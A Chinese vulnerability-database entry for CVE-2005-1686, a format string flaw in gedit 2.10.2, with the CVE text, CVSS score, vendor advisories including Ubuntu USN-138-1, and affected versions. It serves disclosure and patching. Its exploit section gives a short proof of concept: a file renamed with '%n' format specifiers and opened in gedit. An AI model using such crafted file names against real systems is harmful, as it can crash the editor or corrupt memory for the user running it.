CVE-2005-1686
CVSS2.6
发布时间 :2005-05-20 00:00:00
修订时间 :2016-10-17 23:21:43
NMCOPS    

[原文]Format string vulnerability in gedit 2.10.2 may allow attackers to cause a denial of service (application crash) via a bin file with format string specifiers in the filename. NOTE: while this issue is triggered on the command line by the gedit user, it has been reported that web browsers and email clients could be configured to provide a file name as an argument to gedit, so there is a valid attack that crosses security boundaries.


[CNNVD]gEdit文件格式串处理漏洞(CNNVD-200505-1136)

        gedit是GNOME桌面环境的官方文本编辑器。
        gEdit中存在格式串漏洞,攻击者可能利用这个漏洞破坏任意内存,导致以运行程序用户的权限执行任意代码。

- CVSS (基础分值)

CVSS分值: 2.6 [轻微(LOW)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:9845Format string vulnerability in gedit 2.10.2 may allow attackers to cause a denial of service (application crash) via a bin file with format ...
oval:org.mitre.oval:def:1245gedit Format String Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1686
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1686
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1136
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111661117701398&w=2
(UNKNOWN)  BUGTRAQ  20050520 pst.advisory: gedit fun. opensource is god .lol windows
http://security.gentoo.org/glsa/glsa-200506-09.xml
(UNKNOWN)  GENTOO  GLSA-200506-09
http://www.debian.org/security/2005/dsa-753
(UNKNOWN)  DEBIAN  DSA-753
http://www.novell.com/linux/security/advisories/2005_36_sudo.html
(UNKNOWN)  SUSE  SUSE-SA:2005:036
http://www.redhat.com/support/errata/RHSA-2005-499.html
(UNKNOWN)  REDHAT  RHSA-2005:499
http://www.ubuntulinux.org/support/documentation/usn/usn-138-1
(UNKNOWN)  UBUNTU  USN-138-1

- 漏洞信息

gEdit文件格式串处理漏洞
低危 格式化字符串
2005-05-20 00:00:00 2005-10-20 00:00:00
远程  
        gedit是GNOME桌面环境的官方文本编辑器。
        gEdit中存在格式串漏洞,攻击者可能利用这个漏洞破坏任意内存,导致以运行程序用户的权限执行任意代码。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.gnome.org/

- 漏洞信息 (F38144)

Ubuntu Security Notice 138-1 (PacketStormID:F38144)
2005-06-21 00:00:00
Ubuntu  ubuntu.com
advisory,overflow,arbitrary
linux,ubuntu
CVE-2005-1686
[点击下载]

Ubuntu Security Notice USN-138-1 - A format string vulnerability has been discovered in gedit. Calling the program with specially crafted file names caused a buffer overflow, which could be exploited to execute arbitrary code with the privileges of the gedit user.

===========================================================
Ubuntu Security Notice USN-138-1	      June 09, 2005
gedit vulnerability
CAN-2005-1686
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)

The following packages are affected:

gedit

The problem can be corrected by upgrading the affected package to
version 2.8.1-0ubuntu1.1 (for Ubuntu 4.10) and 2.10.2-0ubuntu2 (for
Ubuntu 5.04).  In general, a standard system upgrade is sufficient to
effect the necessary changes.

Details follow:

A format string vulnerability has been discovered in gedit. Calling
the program with specially crafted file names caused a buffer
overflow, which could be exploited to execute arbitrary code with the
privileges of the gedit user.

This becomes security relevant if e. g. your web browser is configued
to open URLs in gedit. If you never open untrusted file names or URLs
in gedit, this flaw does not affect you.


Updated packages for Ubuntu 4.10 (Warty Warthog):

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.8.1-0ubuntu1.1.diff.gz
      Size/MD5:     9414 605064f69529dfef55e811a14c482c44
    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.8.1-0ubuntu1.1.dsc
      Size/MD5:     1751 ef7f5d4ec7adf77d7fe0eca3df751456
    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.8.1.orig.tar.gz
      Size/MD5:  4082500 38447bcce215ddc90205e60deee1f49a

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit-common_2.8.1-0ubuntu1.1_all.deb
      Size/MD5:  1814036 1d7f5fc1152f90b902830602d7a1ae20

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.8.1-0ubuntu1.1_amd64.deb
      Size/MD5:   501052 a58ebb5a3914c37a1f3cc7a339a3eecc

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.8.1-0ubuntu1.1_i386.deb
      Size/MD5:   464902 7e5dc6f7a66976b530b0891c22a52a22

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.8.1-0ubuntu1.1_powerpc.deb
      Size/MD5:   478494 b7b389f80fa6c37871d782e9bc368156

Updated packages for Ubuntu 5.04 (Hoary Hedgehog):

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.10.2-0ubuntu2.diff.gz
      Size/MD5:    51287 b163e88c7caf983d1f863533c0d10e54
    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.10.2-0ubuntu2.dsc
      Size/MD5:     1862 ae8f61880a855ec21f9419b8dcd513b5
    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.10.2.orig.tar.gz
      Size/MD5:  5148694 9469c2605ff2bcff589312bc0227a79d

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit-common_2.10.2-0ubuntu2_all.deb
      Size/MD5:   834914 56aa2aee8546e88d451c432378d6ef07
    http://security.ubuntu.com/ubuntu/pool/universe/g/gedit/gedit-dev_2.10.2-0ubuntu2_all.deb
      Size/MD5:    41476 db0cb15d872dd629174d383c93aa8af5

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.10.2-0ubuntu2_amd64.deb
      Size/MD5:   494800 e0479c5e0e71065b7f38efcd715c4c0b

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.10.2-0ubuntu2_i386.deb
      Size/MD5:   463338 3aa98938e1a77e3c047d1f45eb895776

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/gedit/gedit_2.10.2-0ubuntu2_powerpc.deb
      Size/MD5:   478466 3fd8cc7bcc5145dcd8d4c44a1885ffd1

    

- 漏洞信息

16809
GNOME gedit Filename Format String DoS
Local Access Required, Context Dependent Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

gedit contains a flaw that may allow a local denial of service. The issue is triggered due to the handling of binary files with format string specifiers in the filename. With a specially crafted filename, a malicious user can cause the application to crash resulting in a loss of availability.

- 时间线

2005-05-20 Unknow
2005-05-20 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Gedit Filename Format String Vulnerability
Input Validation Error 13699
Yes No
2005-05-30 12:00:00 2011-04-19 08:54:00
Discovery of this issue is credited to jsk:exworm (www.0xbadexworm.org).

- 受影响的程序版本

Turbolinux Turbolinux Desktop 10.0
Turbolinux Turbolinux 10 F...
Turbolinux Home
Sun Solaris 10_x86
Sun Solaris 10_sparc
SGI ProPack 3.0
SGI Advanced Linux Environment 3.0
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux ES 4
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux AS 4
RedHat Enterprise Linux AS 3
RedHat Enterprise Linux Desktop version 4
RedHat Desktop 4.0
RedHat Desktop 3.0
MandrakeSoft Linux Mandrake 10.2 x86_64
MandrakeSoft Linux Mandrake 10.2
MandrakeSoft Linux Mandrake 10.1 x86_64
MandrakeSoft Linux Mandrake 10.1
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
ImageMagick ImageMagick 5.4.3
+ Turbolinux Turbolinux Workstation 8.0
GNOME gEdit 2.10.2
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
GNOME gEdit 2.8.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
GNOME gEdit 2.8.1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
GNOME gEdit 2.2 .0
GNOME gEdit 2.0.2

- 漏洞讨论

gEdit is prone to a format-string vulnerability. Exploitation may occur when the program is invoked with a filename that includes malicious format specifiers.

Attackers could exploit this issue to corrupt arbitrary regions of memory with attacker-supplied data, potentially resulting in the execution of arbitrary code in the context of the user running the program.

- 漏洞利用

The following example is available:

bash-2.05b#cat fmtexp.c

#include <stdio.h>


int
main()
{
printf("hah gedit\n");
}


bash-2.05b#gcc -o fk fmtexp.c

bash-2.05b#mv fk AA%n%n%n.c

bash-2.05b#gedit AA%n%n%n.c

- 解决方案

Ubuntu has released an advisory (USN-138-1) and fixes to address this issue. Please see the referenced advisory for information on obtaining and applying appropriate fixes.


Turbolinux Home

Turbolinux Turbolinux Desktop 10.0

MandrakeSoft Linux Mandrake 10.1

MandrakeSoft Linux Mandrake 10.1 x86_64

MandrakeSoft Linux Mandrake 10.2 x86_64

MandrakeSoft Linux Mandrake 10.2

GNOME gEdit 2.10.2

GNOME gEdit 2.8.1

GNOME gEdit 2.8.3

MandrakeSoft Corporate Server 3.0 x86_64

MandrakeSoft Corporate Server 3.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站